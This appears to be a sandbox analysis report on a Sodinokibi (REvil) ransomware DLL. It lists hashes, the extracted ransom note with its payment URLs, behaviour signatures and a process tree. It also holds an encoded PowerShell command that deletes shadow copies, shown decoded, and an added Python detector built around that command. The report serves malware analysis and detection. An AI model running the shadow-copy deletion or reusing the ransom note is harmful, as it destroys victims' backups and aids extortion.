Resubmissions

15-09-2024 22:00

240915-1wpj7svapc 10

15-09-2024 21:56

240915-1tbwbsthne 10

20-08-2024 13:49

240820-q4v2vayfmp 10

Analysis

  • max time kernel
    93s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    15-09-2024 22:00

General

  • Target

    bazaar.2020.02/HEUR-Trojan-Ransom.Win32.Sodin.dll

  • Size

    166KB

  • MD5

    9e9b0ef4fc739c3eb36a762122451992

  • SHA1

    035fe67a3d04f0a678724851cabc917b28416fe1

  • SHA256

    0ee7783213426a5e46bc11a91acf5f2d73890bb09bbf4f3b932a4b79eeb6b820

  • SHA512

    01435694c0941b004584d40c3d11866e8f319445ed937095d9777911bd6f36c6bd9449b4effa369120cf6ded9de9a375719e256c6f8380bd5fbd4f4ca0c6d715

  • SSDEEP

    3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3Q7FTivJ:NJ0BXScFyfC3Hd4yg7Fu

Malware Config

Extracted

Path

C:\Recovery\xjuzlk-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension xjuzlk. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3F92B6C75476B614 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3F92B6C75476B614 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: GLw0DjjRiu5U65wM7SzzaNX8lNNkMYDZ/Z1kw7uZf7x7z6pjpf35nm3jg4QJDChO E44Ze7ADCorXckUeZ7CK/Mj8GboowPvGGM3uOZtzhOH37mbnaXMYIjh6IGAFXQpj ZiIS7OSJ64Cijum2CS/Yc71GxR5cSrFRRapAv6lz8vwQ0qkhvMWIdi/xnGSqBcco cvc7IlAG7Ocu+ZM108aDFsiXK7MSR0xrH5DMRthfTI+H1kGhiaoQ/uPMeW/F+2Av nbC5zwMkBhrq/lbOc2YZ15y89KK9LyrD2AKGi+uN5F9ImgwW7qH0tYaQZN/ozn8s v4J+XdDReo/2LkPeRsV0H6iI9OkI4FOdISPnSUEXqUEojX+EtolE+wKOaTQakJUW 6/POC2dnaSlNQse/TvA74wXL4dNFasHREnxbsUy5+bViCd0hCbOmvXUumXrs+NXq s6miXhXc6wuzb75zfKd5D32mNmnd9/0LRwzV3l8QKfaMVDAKOkfnZLcUee9crsRc Ke1R8CCMD8rFzUBabEBSg8FLE3pAH5aXgjqpj/IeQEBrrhGku8/Bbo42BzQWypd4 fkLjJm9ScNV77658y+hAiwvf3MnWtsY8lNN0PjQoux3SRaImLG1AQoTUX6YuxrxF vVH+btcoOYw4zGruoVYcLZ/qKmQDpvQfOkoEnhtUnEGU5DpFaqSRmk2Q4okpkBXf Bo/44qPmHRWZ5BiVvXgmHGnR2r2R4CXjnYdIzC0mIP1QgbleuXvqKvA/BWwECfSj oFJRYYq8NsOf2PXSiDaz3yhA1LZnl/RY9OKkb7plZ0IbN2JF/KoDOI4c7nv/N0yC VWJhluL88qEZ2ISYOJQc2DjsRVYIUdN3nGQ/q/hP/SpILwd0yx5NjuesBtWnkzWu xQmdVDcQ4mIiwG4v7vX8gPYh5BSVGHHVSK4OF7yMKusUNXBG9OXYcGLbVmwV60Y6 CUN+Hio2ZzbCoktmGRWox+DXSsIswsKPbedhBmphgw73Y/bbb+MW3sun4A4gpsAW YEDqXGQytzFIKpoN76nKb1pVzxQR9UkzHiOBTxqthWy8MpiL8Ny0y9fgwFzKMTtX howB/VwXQxxG3EVdyd/oQ+g88wLo9i6hM2qZWgSL2lHHV/IHfCCsyEvPzOkKZSEx rvkhzeN+y0VZIq5tpitVw5MuOfLwjxGj0+Nem0DWcbTfUkDcJIeRCFhZjcg58orj 952RsLo8heTWAVnX/Eyq0QbalDj3ZoCNzZohsYQs582CL+O13lfiuDMcN25RHAT5 DYavxkKfpxJa2QuGGWvyxI+MlyPXHXP8bE1b8aMzB5TWoQiINf7mpNC6sMOzlBVH jiQ1Q7NxaYXhP5I/ZJ8iqQgeAC7ZlCt3FaugSAze5uc8s0aRvhQ= Extension name: xjuzlk -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! 
!!! A system of morality which is based on relative emotional values is a mere illusion, a thoroughly vulgar conception which has nothing sound in it and nothing true. Socrates
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3F92B6C75476B614

http://decryptor.cc/3F92B6C75476B614

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 41 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\bazaar.2020.02\HEUR-Trojan-Ransom.Win32.Sodin.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\bazaar.2020.02\HEUR-Trojan-Ransom.Win32.Sodin.dll,#1
      2⤵
      • Enumerates connected drives
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2192
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1304
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3000
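
The PowerShell child (PID 2192) carries its script as a base64-encoded, UTF-16LE `-EncodedCommand` argument; it decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which is what the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe / unsecapp.exe entries in the tree reflect. The Python below is an added example for this report, not code from the sandbox or from the sample: it decodes that argument from the recorded command line and matches the result against the shadow-copy deletion forms REvil and similar families use (WMI `Win32_Shadowcopy` deletion, `vssadmin delete shadows`, `wmic shadowcopy delete`). `SAMPLE_CMDLINE` is copied from the process tree above; the helper names and pattern names are this example's own choices.

```python
"""Decode a powershell.exe -EncodedCommand argument and flag shadow-copy deletion.

Added example for this report (not sandbox or sample code). The command line
below is copied from the process tree; everything else is illustrative.
"""
import base64
import re
import shlex

# Command line recorded for PID 2192 in the process tree (copied verbatim).
SAMPLE_CMDLINE = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMA"
    "aABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8A"
    "YgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Shadow-copy removal techniques seen across ransomware families. The WMI
# pattern is the one this sample's decoded command matches; the other two
# are the classic command-line variants, listed here for completeness.
SHADOW_COPY_DELETION = {
    "wmi_shadowcopy_delete": re.compile(r"win32_shadowcopy.*\.delete\s*\(", re.I | re.S),
    "vssadmin_delete_shadows": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
}


def _is_encoded_flag(token):
    """True for -e, -ec, -enc, -EncodedCommand and the other prefixes
    powershell.exe resolves to -EncodedCommand (it accepts any unambiguous
    prefix of a parameter name). Only the '-' switch form is handled here."""
    if not token.startswith("-"):
        return False
    name = token[1:].lower()
    return name == "ec" or (name != "" and "encodedcommand".startswith(name))


def decode_encoded_command(cmdline):
    """Return the decoded script from an -EncodedCommand command line, or None
    when the line carries no such argument or the argument is not valid base64."""
    tokens = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(tokens[:-1]):
        if not _is_encoded_flag(tok):
            continue
        blob = tokens[i + 1].strip("\"'")
        # PowerShell requires padding, but some log sources truncate it; restore it.
        blob += "=" * (-len(blob) % 4)
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
        # -EncodedCommand is always UTF-16LE; drop any trailing NUL from odd lengths.
        return raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    return None


def classify(cmdline):
    """Decode the command if it is encoded, then return the sorted names of the
    shadow-copy deletion patterns it matches (empty list when none match)."""
    script = decode_encoded_command(cmdline) or cmdline
    return sorted(name for name, rx in SHADOW_COPY_DELETION.items() if rx.search(script))


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(classify(SAMPLE_CMDLINE))
```

Running the block on the recorded command line prints the decoded `Get-WmiObject ... Delete()` pipeline and the single matching pattern name; feeding it a plain `vssadmin delete shadows` line exercises the non-encoded path, since `classify` falls back to the raw command line when nothing is encoded.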

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Recovery\xjuzlk-readme.txt

      Filesize

      7KB

      MD5

      5e83ce6dfcadf262311023d2f71398d1

      SHA1

      06069c405bf209aba3d3b02a388b5530de13e069

      SHA256

      a6d7248796bbdb0d77774db536b54b96e034df66f70bfb355d77fb0e47a6a01c

      SHA512

      468cc0312ec0dea6553e325e172ab1a0e770682e9ed5bbc3f615de4577f52b5e96be56827b63e3e623e92010b5cf21ec498b0c9a3540c45870db618991e12501

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nctmjsqr.qeq.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2192-0-0x00007FFF42233000-0x00007FFF42235000-memory.dmp

      Filesize

      8KB

    • memory/2192-1-0x0000024DA29C0000-0x0000024DA29E2000-memory.dmp

      Filesize

      136KB

    • memory/2192-11-0x00007FFF42230000-0x00007FFF42CF1000-memory.dmp

      Filesize

      10.8MB

    • memory/2192-12-0x00007FFF42230000-0x00007FFF42CF1000-memory.dmp

      Filesize

      10.8MB

    • memory/2192-15-0x00007FFF42230000-0x00007FFF42CF1000-memory.dmp

      Filesize

      10.8MB